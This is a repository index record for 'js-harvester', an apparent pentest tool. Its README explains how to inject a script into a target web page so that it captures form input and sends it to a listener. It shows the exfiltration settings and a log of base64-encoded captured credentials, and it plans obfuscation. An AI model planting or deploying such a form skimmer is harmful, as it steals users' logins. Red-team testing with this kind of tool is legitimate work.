{"id":46510996,"url":"https://github.com/toneillcodes/js-harvester","last_synced_at":"2026-03-06T16:07:51.033Z","repository":{"id":255278468,"uuid":"849095614","full_name":"toneillcodes/js-harvester","owner":"toneillcodes","description":"A tool for pen testers \u0026 red team operators to use in an engagement where data must be captured from a web form.","archived":false,"fork":false,"pushed_at":"2025-02-05T03:43:39.000Z","size":68,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-05T04:25:28.469Z","etag":null,"topics":["cybersecurity","cybersecurity-tools","offensive-security","pentesting"],"latest_commit_sha":null,"homepage":"","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/toneillcodes.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-08-29T01:04:49.000Z","updated_at":"2025-02-05T03:44:30.000Z","dependencies_parsed_at":"2024-08-29T02:28:12.322Z","dependency_job_id":"fb6208c2-0492-4d0f-b210-5dc637fe60aa","html_url":"https://github.com/toneillcodes/js-harvester","commit_stats":null,"previous_names":["toneillcodes/js-harvester"],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/toneillcodes/js-harvester","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/toneillcodes%2Fjs-harvester","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/toneillcodes%2Fjs-harvester/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/toneillcodes%
2Fjs-harvester/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/toneillcodes%2Fjs-harvester/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/toneillcodes","download_url":"https://codeload.github.com/toneillcodes/js-harvester/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/toneillcodes%2Fjs-harvester/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30184901,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-06T14:42:24.748Z","status":"ssl_error","status_checked_at":"2026-03-06T14:42:14.925Z","response_time":250,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity","cybersecurity-tools","offensive-security","pentesting"],"created_at":"2026-03-06T16:07:50.322Z","updated_at":"2026-03-06T16:07:51.021Z","avatar_url":"https://github.com/toneillcodes.png","language":"JavaScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"# js-harvester\nThis is a tool for pen testers to use in an engagement where data must be captured from a web form.\n\u003e [!CAUTION]\n\u003e Disclaimer: Intended only for use on systems that you are legally authorized to access.\n# installation\n* Requires jQuery\n* Ability to inject harvest.js to the target site\n# usage\n1. 
Identify the target page to harvest data from (see example-forms for reference/test materials)\n2. Add harvest.js to the target page\n```\n\u003cscript type=\"text/javascript\" src=\"harvest.js\"\u003e\u003c/script\u003e\n```\n3. Run an HTTP or HTTPS service to receive data from the script\n```\n┌──(kali㉿hammer)-[~/tools/js-harvester/server]\n└─$ python -m http.server 8080\nServing HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...\n```\n4. Update the settings in harvest.js\n```\nvar dynamicTrackers = true;\t\t\t//\t(boolean, true/false) \nvar bindAllFormsSwitch = true;\t\t//\t(boolean, true/false)\nvar formName = \"loginform2\";\nvar enableEncoding = true;\t\t\t//\t(boolean, true/false)\nvar usePost = false;\t\t\t\t//\t(boolean, true/false)\nvar trackClients = true;\t\t\t//\t(boolean, true/false)\nvar allowSubmission = false;\t\t//\t(boolean, true/false)\nvar _0x3745 = [\"http\",\"://\",\"127.0.0.1\",\"/harvest.php\",\"Content-type\",\"application/x-www-form-urlencoded\",\"GET\",\"POST\",\"HEAD\",\"PUT\",\"DELETE\",\"OPTIONS\",\"PATCH\"];\n```\n\n* \u003cb\u003edynamicTrackers:\u003c/b\u003e if false, manually update siteId and formId tracking values to unique values\n* \u003cb\u003ebindAllFormsSwitch:\u003c/b\u003e boolean value 'true' or 'false'. true will bind all forms on the page, false will bind the form name specified by 'formName'\n* \u003cb\u003eformName:\u003c/b\u003e required if not binding all forms on the page (see bindAllFormsSwitch)\n* \u003cb\u003eenableEncoding:\u003c/b\u003e enables base64 encoding of exfiltrated data, may expand to other encoding types/formats\n* \u003cb\u003eusePost:\u003c/b\u003e boolean value 'true' or 'false'. indicates whether a POST request should be used for data exfiltration, default is to use GET\n* \u003cb\u003etrackClients:\u003c/b\u003e boolean value 'true' or 'false'. controls whether user client (browser) information is collected\n* \u003cb\u003eallowSubmission:\u003c/b\u003e boolean value 'true' or 'false'. 
allows (true) or disables (false) the form submission function on target forms\n* \u003cb\u003e_0x3745:\u003c/b\u003e array of values used for data exfiltration, the first 4 need to be customized for the data exfiltration endpoint\n\n5. Listen. . .\n```\n┌──(kali㉿hammer)-[~/tools/js-harvester/server]\n└─$ python -m http.server 8080\nServing HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...\n192.168.1.211 - - [14/Sep/2024 18:39:22] \"GET /harvest?data=dXNlcm5hbWU6cGV0ZXImcGFzc3dvcmQ6d2VpbmVyJnNpdGVJZDpNVGt5TGpFMk9DNHhMakl6Tnc9PSZmb3JtSWQ6TDJwemFHRnlkbVZ6ZEM5c2IyZHBiaTFtYjNKdExtaDBiV3d0Ykc5bmFXNW1iM0p0 HTTP/1.1\" 200 -\n192.168.1.211 - - [14/Sep/2024 18:39:27] \"GET /harvest?data=dXNlcm5hbWU6YWRtaW4mcGFzc3dvcmQ6YWRtaW4mc2l0ZUlkOk1Ua3lMakUyT0M0eExqSXpOdz09JmZvcm1JZDpMMnB6YUdGeWRtVnpkQzlzYjJkcGJpMW1iM0p0TG1oMGJXd3RiRzluYVc1bWIzSnQ= HTTP/1.1\" 200 -\n192.168.1.211 - - [14/Sep/2024 18:39:33] \"GET /harvest?data=dXNlcm5hbWU6Z2VvcmdlJnBhc3N3b3JkOmJ1cm5zJnNpdGVJZDpNVGt5TGpFMk9DNHhMakl6Tnc9PSZmb3JtSWQ6TDJwemFHRnlkbVZ6ZEM5c2IyZHBiaTFtYjNKdExtaDBiV3d0Ykc5bmFXNW1iM0p0 HTTP/1.1\" 200 -\n^C\nKeyboard interrupt received, exiting.\n                                                                                                                                                                                                                                       \n┌──(kali㉿hammer)-[~/tools/js-harvester/server]\n└─$ \n```\n\n# todo list\n* ~~dynamic form binding and processing~~\n* ~~support for exfiltration through configurable HTTP methods~~\n* ~~use hash values to identify site and form IDs~~\n* ~~ability to bind multiple forms dynamically~~\n* client feedback options\n* enhance decoder tools\n* change form processing to avoid using name or id properties\n* collect client information\n* customizable serialization separators\n* code obfuscation\n* obfuscation for data exfiltration\n* remove jQuery 
dependencies\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftoneillcodes%2Fjs-harvester","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftoneillcodes%2Fjs-harvester","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftoneillcodes%2Fjs-harvester/lists"}